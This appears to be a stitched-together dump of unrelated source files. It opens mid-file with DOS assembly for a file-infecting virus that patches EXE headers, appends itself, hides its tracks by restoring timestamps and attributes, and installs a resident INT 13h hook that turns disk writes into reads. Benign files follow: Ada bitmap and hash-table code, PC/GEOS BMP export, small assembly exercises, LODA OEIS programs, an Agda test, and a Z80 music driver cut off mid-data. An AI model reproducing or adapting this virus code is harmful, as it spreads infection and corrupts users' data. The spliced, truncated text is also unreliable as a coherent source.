bytes units sub ax, [header_size] ; decrease by header size ; Modify header as necessary mov [header_CS], ax ; AX holds CS for virus xor ax, ax ; now zero AX mov [header_IP], ax ; as IP for virus is 0 add [page_count], 2 ; reserve space for virus inc [item_count] ; there'll be one more item mov [last_page], offset header ; last page will be as long ; as virus itself and [last_page], 1FFh ; modulo 512, of course ; Move to file start xor cx, cx ; start means offset 0 xor dx, dx mov ax, 4200h ; DOS Move_File_Ptr function int 21h ; move relatively to start ; Write new header mov dx, offset header ; DS:DX points to new header mov cx, 1Ah ; which is still 1A bytes long mov ah, 40h ; DOS Write_Handle function int 21h ; Move to new Relocation Item position mov cx, di ; get stored position from DI|SI mov dx, si mov ax, 4200h ; DOS Move_File_Ptr function int 21h ; move relatively to start ; Write new relocation item mov [header_IP], offset old_CS ; new Relocation Item offset ; is jump to new mother code mov dx, offset header_IP ; DS:DX = new relocation item mov cx, 4 ; exactly 4 bytes long mov ah, 40h ; DOS Write_Handle function int 21h ; Calculate file offset for new mother code end mov ax, [header_CS] ; get mother code lenght add ax, [header_size] ; add header size mov cx, 10h ; it's in 16 bytes units mul cx ; so multiply by 16 sub ax, bp ; last page is not full sbb dx, 0 ; so move back appropirately ; Move file ptr to mother code end mov cx, dx ; DX|AX = file offset to code end mov dx, ax ; set CX|DX for DOS call mov ax, 4200h ; DOS Move_File_Ptr function int 21h ; move relatively to start ; Write alignement (no matter what, only number is important) mov cx, bp ; get alignement amount mov ah, 40h ; DOS Write_Handle function int 21h ; write CX bytes ; Now prepare to append itself to EXE file ; First encode EXE name patter anew mov si, offset file_name ; DS:SI points to name pattern mov cx, 5 ; it is 5 characters long next_lttr: dec byte ptr [si] ; encode by decrement inc si loop next_lttr ; encode all 5 characters ; All ready, append itself now xor dx, dx ; DX = 0, start offset for virus code mov cx, virus_length ; CX = number of bytes to write mov ah, 40h ; DOS Write_Handle function int 21h ; No further action involving file will be taken, so restore it's state call restore_and_close ; restore date and time, close file ; Restore jump to this mother code mov ax, [aux_CS] ; restore jump addres via AX mov [old_CS], ax mov ax, [aux_IP] mov [old_IP], ax ; All done with infecting, prepare to execute mother ; Restore original DTA push ds ; preserve DS (now DS = CODE) exit: lds dx, old_DTA ; get original DTA address to DS:DX mov ah, 1Ah ; DOS Set_DTA function int 21h ; Check if install new INT_13 vector cmp [install_flag], 0 ; 0 means no installing jz set_DS ; omit installing ; Install resident part mov ax, resident_CS ; load CS for resident to DS (via AX) mov ds, ax xor dx, dx ; DS:DX = address of resident part mov ax, 2513h ; DOS Set_Interrupt_Vector function int 21h ; set vector for INT_13 set_DS: pop ds ; restore DS to CODE mov bx, [old_SS] ; BX = original SS mov cx, [old_SP] ; CX = original SP pop es ; restore original DS and ES pop ds cli ; disable hardware interrupts mov sp, cx ; while restoring original SS:SP mov ss, bx sti ; enable hardware interrupts ; Virus has done all its job, now let mother do its own jump: jmp dummy:d_end ; jump to original code ;----------- here is the one and only procedure -------------------; restore_and_close proc near ; Restore original file time and date mov cx, [time] ; get saved time mov dx, [date] ; get saved date mov ax, 5701h ; DOS Set_File_Time_Date function int 21h ; time set as CX, date as DX ; Close file mov ah, 3Eh ; DOS Close_File function int 21h ; Restore original name mov dx, offset new_name ; DS:DX points to new name mov di, offset found_name ; ES:DI points to original name mov ah, 56h ; DOS Rename_File function int 21h ; Restore original file attributes mov dx, offset found_name ; restore attributes mov cx, [attributes] mov ax, 4301h ; DOS Set_File_Attributes function int 21h ; attributes set as CX ret restore_and_close endp ;------------ and here go the resident part of the virus -------------; resident: pushf ; save flags cmp ah, 3 ; is it Disk_Write_1 ? jnz l1 ; no, check Disk_Write_2 mov ah, 2 ; yes, convert to Disk_Read_1 jmp short call_int ; and exit resident l1: cmp ah, 0Bh ; is it Disk_Write_2 ? jnz call_int ; no, exit resident mov ah, 0Ah ; yes, convert to Disk_Read_2 call_int: popf ; restore flags ; Next 5 bytes form long jump to original INT_13 handler db 0EAh ; means JMP FAR int_IP dw 0 ; and here the address to jump to int_CS dw 0 resident_size equ $ - resident ;-------- now data for virus, just encoded file name pattern -------; file_name db ')-DWD', 0 ;-------------------------------------------------------------------; ; ; ; Here VIRUS ends. The rest are purely placeholders ; ; ; ;-------------------------------------------------------------------; ;*******************************************************************; header dw 13 dup (0) old_SS dw 0 old_SP dw 0 aux_CS dw 0 aux_IP dw 0 old_DTA dd 0 time dw 0 date dw 0 attributes dw 0 install_flag db 0 new_name db 9 dup (0) DTA dw 2Ch dup (0) aux dw 2 dup (0) code ends end start 
bitmap.ads
FROL256/ada-ray-tracer
3
10526
with Interfaces; with Ada.Streams.Stream_IO; with Ada.Unchecked_Deallocation; use Interfaces; use Ada.Streams.Stream_IO; package Bitmap is type PixelData is array (Integer range <>) of Unsigned_32; type PixelDataRef is access PixelData; procedure delete is new Ada.Unchecked_Deallocation(Object => PixelData, Name => PixelDataRef); type Image is record width : Integer; height : Integer; data : PixelDataRef; end record; procedure Init(im : out Image; w : Integer; h : Integer); procedure Delete(im : in out Image); procedure LoadBMP(im : in out Image; a_fileName : String); procedure SaveBMP(im : Image; a_fileName : String); private subtype WORD is Unsigned_16; subtype DWORD is Unsigned_32; type Pixel is record r,g,b : Unsigned_8; end record; type BITBAPFILEHEADER is record bfType : WORD; bfSize : DWORD; bfReserved1 : WORD; bfReserved2 : WORD; bfOffBits : DWORD; end record; type BITMAPINFOHEADER is record biSize : DWORD; biWidth : DWORD; biHeight : DWORD; biPlanes : WORD; biBitCount : WORD; biCompression : DWORD; biSizeImage : DWORD; biXPelsPerMeter : DWORD; biYPelsPerMeter : DWORD; biClrUsed : DWORD; biClrImportant : DWORD; end record; end Bitmap;
Library/Trans/Graphics/Bitmap/Bmp/Lib/libMain.asm
steakknife/pcgeos
504
88075
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1992 -- All Rights Reserved PROJECT: PC GEOS MODULE: Bmp Translation Library FILE: libMain.asm AUTHOR: <NAME>, Apr 28, 1992 ROUTINES: Name Description ---- ----------- GLB TransGetExportOptions Return the handle of the block containing export options REVISION HISTORY: Name Date Description ---- ---- ----------- MS 4/28/92 Initial revision DESCRIPTION: $Id: libMain.asm,v 1.1 97/04/07 11:26:20 newdeal Exp $ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ExportCode segment resource COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% TransGetExportOptions %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Return the handle of the block containing export options CALLED BY: GLOBAL PASS: dx - handle of object block holding UI gadgetry (zero if default options are desired) RETURN: dx - handle of block containing BMPExportBlock structure (or zero if no options) DESTROYED: nothing PSEUDO CODE/STRATEGY: extract the options from the UI gadgetry and setup the structure KNOWN BUGS/SIDE EFFECTS/IDEAS: caller is expected to free the block when finished REVISION HISTORY: Name Date Description ---- ---- ----------- Jim 02/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ TransGetExportOptions proc far uses ax,bx,cx,bp,ds,si,di .enter ;get Export Options from the UI push dx ;save handle of ui gadgetry mov ax,MSG_GEN_ITEM_GROUP_GET_SELECTION mov bx,dx ;block of the UI passed in mov si,offset SelectBitCount mov di,mask MF_CALL call ObjMessage pop dx ;retore ui block handle push ax ;the BitCount selection mov ax,MSG_GEN_ITEM_GROUP_GET_SELECTION mov si,offset SelectFormat mov di,mask MF_CALL call ObjMessage push ax ;the format number selected ;allocate a block to hold the Export Options mov ax,size BMPExportBlock mov cl,mask HF_SHARABLE or mask HF_SWAPABLE mov ch,mask HAF_LOCK call MemAlloc jc error segmov ds,ax ;address of allocated block pop ax ;get Format selection mov ds:[BEO_format],ax pop ax ;restore BitCount selection mov ds:[BEO_bitCount],al call MemUnlock mov dx,bx ;return block in dx clc done: .leave ret error: clr dx add sp,4 ;fixup stack jmp done TransGetExportOptions endp ExportCode ends
MySource/12-jge-100-80-60-40-cmp.asm
mdabdullahibnaharun/Assembly-Language
0
246614
; a number > 100 ? or >= 80 ? > 60 or >= 40 ? or>= 20 ;or less then 20 org 100h include "emu8086.inc" .model small .stack 100h .data .code main proc mov bx,80 cmp bx,100 ;cmp >= 100 jge if1 cmp bx,80 jge if2 cmp bx,60 jge if3 cmp bx,40 jge if4 cmp bx,20 ;cmp >= 100 jge if5 jmp else if1: printn "The number is grater or equal 100 " jmp end_if if2: printn "The number is grater or equal 80 " jmp end_if if3: printn "The number is grater or equal 60 " jmp end_if if4: printn "The number is grater or equal 40 " jmp end_if if5: printn "The number is grater or equal 20 " jmp end_if else: printn "The number is less then 20 " jmp end_if end_if: mov ah,4ch int 21h main endp end main ret
OSDev/Try-1/Kernel/Entry.asm
Ashwin-Paudel/Tries
0
177963
; ; Entry.asm ; KripayaOS Project ; ; Copyright (c) 2021 KripayaOS Project. All rights reserved. ; [bits 64] [extern kernel_start] _start: call kernel_start jmp $
programs/oeis/047/A047369.asm
neoneye/loda
22
90987
<filename>programs/oeis/047/A047369.asm ; A047369: Numbers that are congruent to {1, 2, 3, 4, 5} mod 7. ; 1,2,3,4,5,8,9,10,11,12,15,16,17,18,19,22,23,24,25,26,29,30,31,32,33,36,37,38,39,40,43,44,45,46,47,50,51,52,53,54,57,58,59,60,61,64,65,66,67,68,71,72,73,74,75,78,79,80,81,82,85,86,87,88,89,92,93,94,95,96,99,100,101,102,103,106,107,108,109,110,113,114,115,116,117,120,121,122,123,124,127,128,129,130,131,134,135,136,137,138 mov $1,$0 div $1,5 mul $1,2 add $0,$1 add $0,1
programs/oeis/164/A164356.asm
neoneye/loda
22
241724
; A164356: Expansion of (1 - x^2)^4 / ((1 - x)^4 * (1 - x^4)) in powers of x. ; 1,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4,2,4,6,4 mov $2,$0 mul $2,5 div $2,2 pow $2,3 lpb $2 add $2,4 dif $2,4 lpe mov $0,$2 add $0,1 mod $0,10
test/succeed/Issue442.agda
asr/agda-kanso
0
9326
{-# OPTIONS --allow-unsolved-metas #-} module Issue442 where postulate A : Set f : (P : A → A → Set) → (∀ {x} → P x x) → (∀ {x y z} → P y z → P x y → A) → A P : A → A → Set reflP : ∀ {x} → P x x g : ∀ {x y z} → P y z → P x y → A a : A a = f _ reflP g
source/containers/a-cohata.adb
ytomino/drake
33
29526
with Ada.Unchecked_Deallocation; package body Ada.Containers.Hash_Tables is procedure Free is new Unchecked_Deallocation (Table, Table_Access); subtype Positive_Hash_Type is Hash_Type range 1 .. Hash_Type'Last; procedure Allocate ( New_Container : out Table_Access; Capacity : Count_Type); procedure Allocate ( New_Container : out Table_Access; Capacity : Count_Type) is begin New_Container := new Table'( Last_Index => Hash_Type (Capacity) - 1, First => null, Entries => (others => (First => null, Previous => null))); end Allocate; function Find_Node ( Container : Table_Access; Node : not null Node_Access; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean) return Node_Access; function Find_Node ( Container : Table_Access; Node : not null Node_Access; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean) return Node_Access is begin if Container /= null then declare Index : constant Hash_Type := Node.Hash rem Positive_Hash_Type'(Container.Entries'Length); Position : Node_Access := Container.Entries (Index).First; begin if Position /= null then loop if Equivalent (Node, Position) then return Position; end if; exit when Position.Next = null or else Position.Next.Index /= Index; Position := Position.Next; end loop; end if; end; end if; return null; end Find_Node; procedure Insert_No_Rebuild ( Container : not null Table_Access; Hash : Hash_Type; New_Item : not null Node_Access); procedure Insert_No_Rebuild ( Container : not null Table_Access; Hash : Hash_Type; New_Item : not null Node_Access) is Index : constant Hash_Type := Hash rem Positive_Hash_Type'(Container.Entries'Length); begin New_Item.Hash := Hash; New_Item.Index := Index; if Container.Entries (Index).First /= null then if Container.First = Container.Entries (Index).First then Container.First := New_Item; else Container.Entries (Index).Previous.Next := New_Item; end if; New_Item.Next := Container.Entries (Index).First; Container.Entries (Index).First := New_Item; else if Container.First /= null then Container.Entries (Container.First.Index).Previous := New_Item; end if; New_Item.Next := Container.First; Container.First := New_Item; Container.Entries (Index).First := New_Item; end if; end Insert_No_Rebuild; -- implementation function First (Container : Table_Access) return Node_Access is begin if Container /= null then return Container.First; else return null; end if; end First; procedure Iterate ( Container : Table_Access; Process : not null access procedure (Position : not null Node_Access)) is Position : Node_Access := First (Container); begin while Position /= null loop Process (Position); Position := Position.Next; end loop; end Iterate; function Is_Before (Before, After : Node_Access) return Boolean is begin if Before = After then return False; elsif Before.Index < After.Index then return True; elsif Before.Index > After.Index then return False; else declare Index : constant Hash_Type := Before.Index; I : Node_Access := Before.Next; J : Node_Access := After.Next; begin loop if J = null or else I = After or else J.Index /= Index then return True; elsif I = null or else J = Before or else I.Index /= Index then return False; else I := I.Next; J := J.Next; end if; end loop; end; end if; end Is_Before; function Find ( Container : Table_Access; Hash : Hash_Type; Params : System.Address; Equivalent : not null access function ( Position : not null Node_Access; Params : System.Address) return Boolean) return Node_Access is begin if Container /= null then declare Index : constant Hash_Type := Hash rem Positive_Hash_Type'(Container.Entries'Length); Position : Node_Access := Container.Entries (Index).First; begin if Position /= null then loop if Equivalent (Position, Params) then return Position; end if; exit when Position.Next = null or else Position.Next.Index /= Index; Position := Position.Next; end loop; end if; end; end if; return null; end Find; function Equivalent ( Left : Table_Access; Left_Length : Count_Type; Right : Table_Access; Right_Length : Count_Type; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean) return Boolean is begin return Left_Length = Right_Length and then Is_Subset (Left, Right, Equivalent); end Equivalent; function Overlap ( Left, Right : Table_Access; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean) return Boolean is begin if Left = null or else Right = null then return False; else declare Left_Position : Node_Access := Left.First; begin while Left_Position /= null loop if Find_Node (Right, Left_Position, Equivalent) /= null then return True; end if; Left_Position := Left_Position.Next; end loop; end; return False; end if; end Overlap; function Is_Subset ( Subset, Of_Set : Table_Access; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean) return Boolean is begin if Subset = null or else Of_Set = null then return Subset = null; else declare Left_Position : Node_Access := Subset.First; begin while Left_Position /= null loop if Find_Node (Of_Set, Left_Position, Equivalent) = null then return False; end if; Left_Position := Left_Position.Next; end loop; end; return True; end if; end Is_Subset; function Capacity (Container : Table_Access) return Count_Type is begin if Container = null then return 0; else return Container.Entries'Length; end if; end Capacity; procedure Free ( Container : in out Table_Access; Length : in out Count_Type; Free : not null access procedure (Object : in out Node_Access)) is begin if Container /= null then declare Position : Node_Access := Container.First; begin while Position /= null loop declare Next : constant Node_Access := Position.Next; begin Free (Position); Position := Next; end; end loop; end; Hash_Tables.Free (Container); end if; Length := 0; end Free; procedure Copy ( Target : out Table_Access; Length : out Count_Type; Source : Table_Access; New_Capacity : Count_Type; Copy : not null access procedure ( Target : out Node_Access; Source : not null Node_Access)) is begin pragma Assert (New_Capacity > 0 or else First (Source) = null); Length := 0; if New_Capacity > 0 then Allocate (Target, New_Capacity); declare Position : Node_Access := First (Source); begin while Position /= null loop declare New_Node : Node_Access; begin Copy (New_Node, Position); Insert_No_Rebuild (Target, Position.Hash, New_Node); end; Length := Length + 1; Position := Position.Next; end loop; end; end if; end Copy; procedure Rebuild ( Container : in out Table_Access; New_Capacity : Count_Type) is begin if New_Capacity /= Capacity (Container) then declare Position : Node_Access; begin if Container /= null then Position := Container.First; Free (Container); end if; pragma Assert (New_Capacity > 0 or else Position = null); if New_Capacity > 0 then Allocate (Container, New_Capacity); while Position /= null loop declare Next : constant Node_Access := Position.Next; begin Insert_No_Rebuild (Container, Position.Hash, Position); Position := Next; end; end loop; end if; end; end if; end Rebuild; procedure Insert ( Container : in out Table_Access; Length : in out Count_Type; Hash : Hash_Type; New_Item : not null Node_Access) is begin if Container = null or else Length >= Container.Entries'Length then declare New_Length : constant Count_Type := Count_Type'Max (13, Length * 2 + 1); begin Rebuild (Container, New_Length); end; end if; Insert_No_Rebuild (Container, Hash, New_Item); Length := Length + 1; end Insert; procedure Remove ( Container : Table_Access; Length : in out Count_Type; Item : not null Node_Access) is Previous : Node_Access; begin if Container.Entries (Item.Index).First = Item then Previous := Container.Entries (Item.Index).Previous; if Item.Next /= null and then Item.Next.Index = Item.Index then Container.Entries (Item.Index).First := Item.Next; else Container.Entries (Item.Index).First := null; Container.Entries (Item.Index).Previous := null; end if; if Previous = null then -- Item = Container.First Container.First := Item.Next; else Previous.Next := Item.Next; end if; else Previous := Container.Entries (Item.Index).First; while Previous.Next /= Item loop Previous := Previous.Next; end loop; Previous.Next := Item.Next; end if; if Item.Next /= null and then Item.Next.Index /= Item.Index then Container.Entries (Item.Next.Index).Previous := Previous; end if; Length := Length - 1; end Remove; procedure Merge ( Target : in out Table_Access; Length : in out Count_Type; Source : Table_Access; Source_Length : Count_Type; Filter : Filter_Type; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean; Copy : access procedure ( Target : out Node_Access; Source : not null Node_Access); Free : access procedure (Object : in out Node_Access)) is begin if Target = Source then -- RM A.18.7(62/2, 66/2) if not Filter (In_Both) then Hash_Tables.Free (Target, Length, Free); end if; elsif Length = 0 then if Filter (In_Only_Right) and then Source_Length > 0 then Hash_Tables.Free (Target); Hash_Tables.Copy (Target, Length, Source, Source_Length, Copy); end if; elsif Source_Length = 0 then if not Filter (In_Only_Left) then -- Length > 0 Hash_Tables.Free (Target, Length, Free); end if; else declare I, Next : Node_Access; New_Node : Node_Access; From_Right : Node_Access := null; begin if Filter (In_Only_Right) then I := Source.First; while I /= null loop if Find_Node (Target, I, Equivalent) = null then Copy (New_Node, I); New_Node.Hash := I.Hash; New_Node.Next := From_Right; From_Right := New_Node; end if; I := I.Next; end loop; end if; I := Target.First; while I /= null loop Next := I.Next; if Find_Node (Source, I, Equivalent) /= null then if not Filter (In_Both) then Remove (Target, Length, I); Free (I); end if; else if not Filter (In_Only_Left) then Remove (Target, Length, I); Free (I); end if; end if; I := Next; end loop; while From_Right /= null loop Next := From_Right.Next; Insert (Target, Length, From_Right.Hash, From_Right); From_Right := Next; end loop; end; end if; end Merge; procedure Copying_Merge ( Target : out Table_Access; Length : out Count_Type; Left : Table_Access; Left_Length : Count_Type; Right : Table_Access; Right_Length : Count_Type; Filter : Filter_Type; Equivalent : not null access function ( Left, Right : not null Node_Access) return Boolean; Copy : not null access procedure ( Target : out Node_Access; Source : not null Node_Access)) is begin if Left_Length = 0 then if Filter (In_Only_Right) and then Right_Length > 0 then Hash_Tables.Copy (Target, Length, Right, Right_Length, Copy => Copy); else Target := null; Length := 0; end if; elsif Right_Length = 0 then if Filter (In_Only_Left) then -- Left_Length > 0 Hash_Tables.Copy (Target, Length, Left, Left_Length, Copy => Copy); else Target := null; Length := 0; end if; else Target := null; Length := 0; declare I : Node_Access; New_Node : Node_Access; begin I := Left.First; while I /= null loop if Find_Node (Right, I, Equivalent) /= null then if Filter (In_Both) then Copy (New_Node, I); Insert (Target, Length, I.Hash, New_Node); end if; else if Filter (In_Only_Left) then Copy (New_Node, I); Insert (Target, Length, I.Hash, New_Node); end if; end if; I := I.Next; end loop; if Filter (In_Only_Right) then I := Right.First; while I /= null loop if Find_Node (Left, I, Equivalent) = null then Copy (New_Node, I); Insert (Target, Length, I.Hash, New_Node); end if; I := I.Next; end loop; end if; end; end if; end Copying_Merge; end Ada.Containers.Hash_Tables;
genesis/fm_mus.asm
michaelcmartin/bumbershoot
20
19734
<reponame>michaelcmartin/bumbershoot<gh_stars>10-100 ;; Simple Z80 FM Music Driver. ;; A song in this system is a series of records, where each record ;; begins with a byte for the number of frames this record lasts, ;; followed by a byte for the number of register writes to the first ;; block of FM registers, followed by that many pairs of (register, ;; value) bytes. ;; When a zero byte is reached for a record length, the playback ;; loops back to the "segno" label. org 0 defc psg=$7f11 rst_0: di im 1 ld sp, $2000 ei rst_lp: jr rst_lp defs $20-ASMPC ptr: defw song vol: defb $1f, $1f, $1f wait: defb $01 defs $38-ASMPC rst_38: push af push bc push ix push hl ld hl, wait dec (hl) jr nz, idone ld ix, $4000 ld hl, (ptr) ld a, (hl) and a jr nz, nolp ld hl, segno ld a, (hl) nolp: ld (wait), a inc hl ld b, (hl) inc hl rlp: ld a, (hl) ld (ix+0), a inc hl ld a, (hl) inc hl ld (ix+1), a djnz rlp ld (ptr), hl ;; The video interrupt is held for 64 microseconds. To make sure we ;; don't end up double-dipping, spin for a bit before returning. idone: ld b, 64 ilp: djnz ilp pop hl pop ix pop bc pop af ei reti song: segno: defb $0D,$42,$30,$71,$34,$0D,$38,$33,$3C,$01,$40,$23,$44,$2D,$48,$26 defb $4C,$00,$50,$5F,$54,$99,$58,$5F,$5C,$94,$60,$05,$64,$05,$68,$05 defb $6C,$07,$70,$02,$74,$02,$78,$02,$7C,$02,$80,$11,$84,$11,$88,$11 defb $8C,$A6,$90,$00,$94,$00,$98,$00,$9C,$00,$B0,$32,$B4,$C0,$31,$71 defb $35,$0D,$39,$33,$3D,$01,$41,$23,$45,$2D,$49,$26,$4D,$00,$51,$5F defb $55,$99,$59,$5F,$5D,$94,$61,$05,$65,$05,$69,$05,$6D,$07,$71,$02 defb $75,$02,$79,$02,$7D,$02,$81,$11,$85,$11,$89,$11,$8D,$A6,$91,$00 defb $95,$00,$99,$00,$9D,$00,$B0,$32,$B4,$C0,$A4,$17,$A0,$89,$28,$F0 defb $A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C,$A0,$BF defb $28,$F0,$02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0,$02,$01 defb $28,$00,$07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01,$02,$01 defb $28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1 defb $02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07,$A1,$89 defb $28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1,$02,$01 defb $28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C defb $A0,$BF,$28,$F0,$02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0 defb $02,$01,$28,$00,$07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07 defb $A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C defb $A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$1A,$06,$A4,$1E defb $A0,$56,$28,$F0,$A5,$0D,$A1,$08,$28,$F1,$04,$02,$28,$00,$28,$01 defb $1A,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0F,$A1,$89,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$1E,$A0,$56,$28,$F0,$A5,$0D,$A1,$08 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$89,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$1A,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0C defb $A1,$BF,$28,$F1,$04,$02,$28,$00,$28,$01,$1A,$06,$A4,$1D,$A0,$A5 defb $28,$F0,$A5,$0F,$A1,$89,$28,$F1,$04,$02,$28,$00,$28,$01,$0D,$06 defb $A4,$1D,$A0,$A5,$28,$F0,$A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00 defb $0B,$03,$A4,$1F,$A0,$89,$28,$F0,$02,$01,$28,$01,$02,$01,$28,$00 defb $1A,$06,$A4,$1D,$A0,$08,$28,$F0,$A5,$0C,$A1,$3B,$28,$F1,$04,$02 defb $28,$00,$28,$01,$0D,$06,$A4,$1D,$A0,$A5,$28,$F0,$A5,$0F,$A1,$1D defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$08,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$BF,$28,$F0,$A5,$0F defb $A1,$89,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1D,$A0,$08,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0E,$A1,$56 defb $28,$F1,$02,$01,$28,$01,$0D,$03,$A5,$0F,$A1,$1D,$28,$F1,$02,$01 defb $28,$01,$0D,$03,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0D,$03 defb $A5,$0E,$A1,$56,$28,$F1,$02,$01,$28,$01,$03,$03,$A5,$0F,$A1,$1D defb $28,$F1,$0A,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$0F,$A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03,$A4,$1C defb $A0,$BF,$28,$F0,$02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5,$28,$F0 defb $02,$01,$28,$00,$07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01,$28,$01 defb $02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D,$A1,$A5 defb $28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0,$02,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0,$A5,$07 defb $A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF,$28,$F1 defb $02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89,$28,$F0 defb $A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F,$A1,$89 defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C defb $A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17 defb $A0,$89,$28,$F0,$A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$00,$0D,$03 defb $A4,$1C,$A0,$BF,$28,$F0,$02,$01,$28,$00,$0D,$03,$A4,$1D,$A0,$A5 defb $28,$F0,$02,$01,$28,$00,$07,$03,$A4,$1F,$A0,$89,$28,$F0,$06,$01 defb $28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1C,$A0,$3B,$28,$F0,$A5,$0D defb $A1,$A5,$28,$F1,$02,$01,$28,$00,$0B,$03,$A4,$1F,$A0,$1D,$28,$F0 defb $02,$01,$28,$01,$02,$01,$28,$00,$0D,$06,$A4,$1F,$A0,$89,$28,$F0 defb $A5,$07,$A1,$89,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0C,$A1,$BF defb $28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17,$A0,$89 defb $28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03,$A5,$0F defb $A1,$89,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$0D,$06,$A4,$17 defb $A0,$89,$28,$F0,$A5,$0D,$A1,$A5,$28,$F1,$02,$01,$28,$01,$0B,$03 defb $A5,$0C,$A1,$BF,$28,$F1,$02,$01,$28,$00,$02,$01,$28,$01,$1A,$06 defb 